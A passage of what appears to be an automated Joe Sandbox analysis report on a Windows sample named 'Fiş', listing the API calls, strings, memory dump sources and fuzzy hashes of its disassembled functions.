                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EA286F
                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00EA28A1
                                                        • CloseHandle.KERNEL32(?), ref: 00EA28D0
                                                        • CloseHandle.KERNEL32(?), ref: 00EA2947
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                        • String ID:
                                                        • API String ID: 4090791747-0
                                                        • Opcode ID: 9218fb9ec549d4fe75a6cb93db4064aa0240071123580b4b38a270aae14a806e
                                                        • Instruction ID: 5565505ff94e21e50a7579d64453de16595dcc70d157ac0b027ee64520e64b6b
                                                        • Opcode Fuzzy Hash: 9218fb9ec549d4fe75a6cb93db4064aa0240071123580b4b38a270aae14a806e
                                                        • Instruction Fuzzy Hash: D2D1BF316042009FCB14EF28C851A6ABBE1BF89314F14986DF9897F2A2DB31ED45CB52
                                                        APIs
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00EAB3F4
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: InvalidateRect
                                                        • String ID:
                                                        • API String ID: 634782764-0
                                                        • Opcode ID: ce2268638e313540ee51841fdd7135d78edd870fecc0108a13fc668accf04597
                                                        • Instruction ID: aecc19927047215b7aeed18ebb58152693cf9260adc5405e12e40a0cf878df94
                                                        • Opcode Fuzzy Hash: ce2268638e313540ee51841fdd7135d78edd870fecc0108a13fc668accf04597
                                                        • Instruction Fuzzy Hash: D6518230500204BFEF249F258C85BAE3BA5AB0E318F646115FA65FE1E3D7B2F954DA50
                                                        APIs
                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00EBDB1B
                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00EBDB3C
                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00EBDB51
                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00EBDB6E
                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00EBDB95
                                                        • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00E5A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00EBDBA0
                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00EBDBBD
                                                        • DestroyIcon.USER32(00000000,?,?,?,?,?,?,00E5A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00EBDBC8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                        • String ID:
                                                        • API String ID: 1268354404-0
                                                        • Opcode ID: f41c6b0eb771f8efcf145820693f60ca2fb6e39c6d8454d4d6f077e35124566f
                                                        • Instruction ID: cc8c72b681ed585570f12d755313e1bdedb1172018e0b54430ec38ee48109b6a
                                                        • Opcode Fuzzy Hash: f41c6b0eb771f8efcf145820693f60ca2fb6e39c6d8454d4d6f077e35124566f
                                                        • Instruction Fuzzy Hash: 3E518930604208EFDB20DF28CC81FAA77F9BB08355F141A29F946B7290D7B1AC94DB50
                                                        APIs
                                                          • Part of subcall function 00E86EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00E85FA6,?), ref: 00E86ED8
                                                          • Part of subcall function 00E86EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00E85FA6,?), ref: 00E86EF1
                                                          • Part of subcall function 00E872CB: GetFileAttributesW.KERNEL32(?,00E86019), ref: 00E872CC
                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00E875CA
                                                        • _wcscmp.LIBCMT ref: 00E875E2
                                                        • MoveFileW.KERNEL32(?,?), ref: 00E875FB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                        • String ID:
                                                        • API String ID: 793581249-0
                                                        • Opcode ID: 2429fef495aec1666412daa608c45f6422f229b0a81df5d818ad4d9ee719dc93
                                                        • Instruction ID: d3aa0a0aeb04661a888ba99a38768107956377b1fd9e1d8398ff736ce6776b36
                                                        • Opcode Fuzzy Hash: 2429fef495aec1666412daa608c45f6422f229b0a81df5d818ad4d9ee719dc93
                                                        • Instruction Fuzzy Hash: A6512EB2A492299ADF54FB94E841DDE73BCAF08310B1050AAF64DF3141EA75D7C9CB60
                                                        APIs
                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00EBDAD1,00000004,00000000,00000000), ref: 00E5EAEB
                                                        • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00EBDAD1,00000004,00000000,00000000), ref: 00E5EB32
                                                        • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00EBDAD1,00000004,00000000,00000000), ref: 00EBDC86
                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00EBDAD1,00000004,00000000,00000000), ref: 00EBDCF2
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ShowWindow
                                                        • String ID:
                                                        • API String ID: 1268545403-0
                                                        • Opcode ID: 400f572a6463b5d0f6345dd2767fa686978e48c12571df1fa02baeeff026e6b3
                                                        • Instruction ID: e348dd6fd380003d997dbae3a079226782e8b3b44aaf86fadc17a9c9276e337b
                                                        • Opcode Fuzzy Hash: 400f572a6463b5d0f6345dd2767fa686978e48c12571df1fa02baeeff026e6b3
                                                        • Instruction Fuzzy Hash: DC41073020C240DAC77D47288D8DAB77A96BB4130BF193C1DE88772761D6727A48D610
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00E7AEF1,00000B00,?,?), ref: 00E7B26C
                                                        • HeapAlloc.KERNEL32(00000000,?,00E7AEF1,00000B00,?,?), ref: 00E7B273
                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E7AEF1,00000B00,?,?), ref: 00E7B288
                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,00E7AEF1,00000B00,?,?), ref: 00E7B290
                                                        • DuplicateHandle.KERNEL32(00000000,?,00E7AEF1,00000B00,?,?), ref: 00E7B293
                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00E7AEF1,00000B00,?,?), ref: 00E7B2A3
                                                        • GetCurrentProcess.KERNEL32(00E7AEF1,00000000,?,00E7AEF1,00000B00,?,?), ref: 00E7B2AB
                                                        • DuplicateHandle.KERNEL32(00000000,?,00E7AEF1,00000B00,?,?), ref: 00E7B2AE
                                                        • CreateThread.KERNEL32(00000000,00000000,00E7B2D4,00000000,00000000,00000000), ref: 00E7B2C8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                        • String ID:
                                                        • API String ID: 1957940570-0
                                                        • Opcode ID: f968bad9c558206050d5e03d553a94ca2bc11699ae1d5c7581bba74a8d716194
                                                        • Instruction ID: 51dc76fd8aaeb91305229ff83a89d35dde619d2745b3aabf4693379724edf2a8
                                                        • Opcode Fuzzy Hash: f968bad9c558206050d5e03d553a94ca2bc11699ae1d5c7581bba74a8d716194
                                                        • Instruction Fuzzy Hash: C201C275244344BFE710AFA6DC4DF5B7BACEB88B11F018435FA05DB2A1C6769805CB61
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                        • API String ID: 0-572801152
                                                        • Opcode ID: 4085ac7a1388e76f4f254e53176a4bf05ef008cf3d4ab385cf14e6d737e9dd0f
                                                        • Instruction ID: ca6dc6ddeff2cd856bd913e49a799ac2d0a6abe15ad7c66f47443e96aa475a03
                                                        • Opcode Fuzzy Hash: 4085ac7a1388e76f4f254e53176a4bf05ef008cf3d4ab385cf14e6d737e9dd0f
                                                        • Instruction Fuzzy Hash: A9E1C271A00219AFDF14EFA8D881AEE77F5EF48754F249029F905BB281D770AD41CB90
                                                        APIs
                                                          • Part of subcall function 00E4936C: __swprintf.LIBCMT ref: 00E493AB
                                                          • Part of subcall function 00E4936C: __itow.LIBCMT ref: 00E493DF
                                                          • Part of subcall function 00E5C6F4: _wcscpy.LIBCMT ref: 00E5C717
                                                        • _wcstok.LIBCMT ref: 00E9184E
                                                        • _wcscpy.LIBCMT ref: 00E918DD
                                                        • _memset.LIBCMT ref: 00E91910
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                        • String ID: X$p2
                                                        • API String ID: 774024439-3332900272
                                                        • Opcode ID: 1f85d7f728247f53c0f5b679107e5245f25ff953240868b7ec102d7fef603914
                                                        • Instruction ID: cac50c6566aa6392407a02bd4c842f809bd3080c0d3011092c600d20051baf6c
                                                        • Opcode Fuzzy Hash: 1f85d7f728247f53c0f5b679107e5245f25ff953240868b7ec102d7fef603914
                                                        • Instruction Fuzzy Hash: 6EC1AF716093419FC724EF24D881AAAB7E0FF85354F00596DF999B72A2DB70ED05CB82
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: Q\E$[$\$\$]$^
                                                        • API String ID: 2102423945-1026548749
                                                        • Opcode ID: bbf5d73e217888ecc0844583e02ec66661da3cb3ad9f2d159d1aabfc7a1228b9
                                                        • Instruction ID: ef1319748b3134eb383cde00d265820222e33661097ed51e1687e66ff96af217
                                                        • Opcode Fuzzy Hash: bbf5d73e217888ecc0844583e02ec66661da3cb3ad9f2d159d1aabfc7a1228b9
                                                        • Instruction Fuzzy Hash: D8518D71E002199BCF24CF98D9817EEB7B2BF88318F29916AD854B7251E7309D85CB80
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00EA9B19
                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 00EA9B2D
                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00EA9B47
                                                        • _wcscat.LIBCMT ref: 00EA9BA2
                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 00EA9BB9
                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00EA9BE7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window_wcscat
                                                        • String ID: SysListView32
                                                        • API String ID: 307300125-78025650
                                                        • Opcode ID: ec0267025bab3ffe88dac0757847e363f86599fcfbfddfc9d8ca51e489e58440
                                                        • Instruction ID: c24dfa37d7a24cd89d41c63fb2f20657a11a5bbb30e2b7d8a0420a2e2bbcc371
                                                        • Opcode Fuzzy Hash: ec0267025bab3ffe88dac0757847e363f86599fcfbfddfc9d8ca51e489e58440
                                                        • Instruction Fuzzy Hash: 3541BF70940308AFDB219FA4DC85FEA77E8EF0D354F10142AF585BB292C672AD85CB64
                                                        APIs
                                                          • Part of subcall function 00E86532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00E86554
                                                          • Part of subcall function 00E86532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00E86564
                                                          • Part of subcall function 00E86532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00E865F9
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EA179A
                                                        • GetLastError.KERNEL32 ref: 00EA17AD
                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EA17D9
                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00EA1855
                                                        • GetLastError.KERNEL32(00000000), ref: 00EA1860
                                                        • CloseHandle.KERNEL32(00000000), ref: 00EA1895
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                        • String ID: SeDebugPrivilege
                                                        • API String ID: 2533919879-2896544425
                                                        • Opcode ID: fe666e18c3925c3c5e6b59a5dbbd49223dd2e3fd1a40f978a663503589081884
                                                        • Instruction ID: b5590c7c6ec588087a115b42a106dd0248d1945791485f31d9a65f3469b79b7d
                                                        • Opcode Fuzzy Hash: fe666e18c3925c3c5e6b59a5dbbd49223dd2e3fd1a40f978a663503589081884
                                                        • Instruction Fuzzy Hash: 1541B271700200AFDB15EF54CC95F6DB7E1AF49704F0494A8FA0ABF2D2DB79A9058B51
                                                        APIs
                                                        • LoadIconW.USER32(00000000,00007F03), ref: 00E858B8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: IconLoad
                                                        • String ID: blank$info$question$stop$warning
                                                        • API String ID: 2457776203-404129466
                                                        • Opcode ID: 0fcf60a0fe2559926c08e2e8b4e657a12c49c6cf6ddfbb526aaccd9150f3da42
                                                        • Instruction ID: ea58039070ec4ca4da1a2d2b13b9325787269ce0d20efe8636f07fca979935c6
                                                        • Opcode Fuzzy Hash: 0fcf60a0fe2559926c08e2e8b4e657a12c49c6cf6ddfbb526aaccd9150f3da42
                                                        • Instruction Fuzzy Hash: 5411EB3334D756FEE7196B649C82DAB73DC9F15354B20103BF60CF6281EB61AA004765
                                                        APIs
                                                        • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 00E8A806
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ArraySafeVartype
                                                        • String ID:
                                                        • API String ID: 1725837607-0
                                                        • Opcode ID: 44e6e32f0c32d56b5eacf7ab62c868614ed41de2f0ca9cec71962b914087d553
                                                        • Instruction ID: 938dc9b23e42a31235290c55a77954dd9a5e376231f53471bc1e4403b4ba90ed
                                                        • Opcode Fuzzy Hash: 44e6e32f0c32d56b5eacf7ab62c868614ed41de2f0ca9cec71962b914087d553
                                                        • Instruction Fuzzy Hash: 33C18B759042099FEB08EF94C481BAEB7F4EF08315F28507AE61DF7241D735A946CB91
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E86B63
                                                        • LoadStringW.USER32(00000000), ref: 00E86B6A
                                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E86B80
                                                        • LoadStringW.USER32(00000000), ref: 00E86B87
                                                        • _wprintf.LIBCMT ref: 00E86BAD
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E86BCB
                                                        Strings
                                                        • %s (%d) : ==> %s: %s %s, xrefs: 00E86BA8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadModuleString$Message_wprintf
                                                        • String ID: %s (%d) : ==> %s: %s %s
                                                        • API String ID: 3648134473-3128320259
                                                        • Opcode ID: 8cedaf1b6ea7fc6b211d61bfa096d6c16ef5c88923fdc76ca2477c5ad8e40df2
                                                        • Instruction ID: b7075aebd4fb070eeddb6e1b91180a40d5c19a399b6d9cb5cd515ffd23f0d686
                                                        • Opcode Fuzzy Hash: 8cedaf1b6ea7fc6b211d61bfa096d6c16ef5c88923fdc76ca2477c5ad8e40df2
                                                        • Instruction Fuzzy Hash: B50136F6504208BFE711A7A59D89EF7776CD704344F0044B1B749F2041EA759E898F70
                                                        APIs
                                                          • Part of subcall function 00EA3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EA2BB5,?,?), ref: 00EA3C1D
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EA2BF6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: BuffCharConnectRegistryUpper
                                                        • String ID:
                                                        • API String ID: 2595220575-0
                                                        • Opcode ID: 964878c91cd1e2e1a98c932b7563df2ab3b3ca259c17d3b04e71dda9ac71d079
                                                        • Instruction ID: cb26380a77dfbd579c25048b65ddfd7e6b92c016ce96c242d930d1afbff1ad07
                                                        • Opcode Fuzzy Hash: 964878c91cd1e2e1a98c932b7563df2ab3b3ca259c17d3b04e71dda9ac71d079
                                                        • Instruction Fuzzy Hash: B4916B712042019FCB10EF58C895B6EB7E5FF89314F14981DFA96BB2A2DB31E905CB42
                                                        APIs
                                                        • select.WSOCK32 ref: 00E99691
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00E9969E
                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 00E996C8
                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00E996E9
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00E996F8
                                                        • htons.WSOCK32(?,?,?,00000000,?), ref: 00E997AA
                                                        • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,00EDDC00), ref: 00E99765
                                                          • Part of subcall function 00E7D2FF: _strlen.LIBCMT ref: 00E7D309
                                                        • _strlen.LIBCMT ref: 00E99800
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
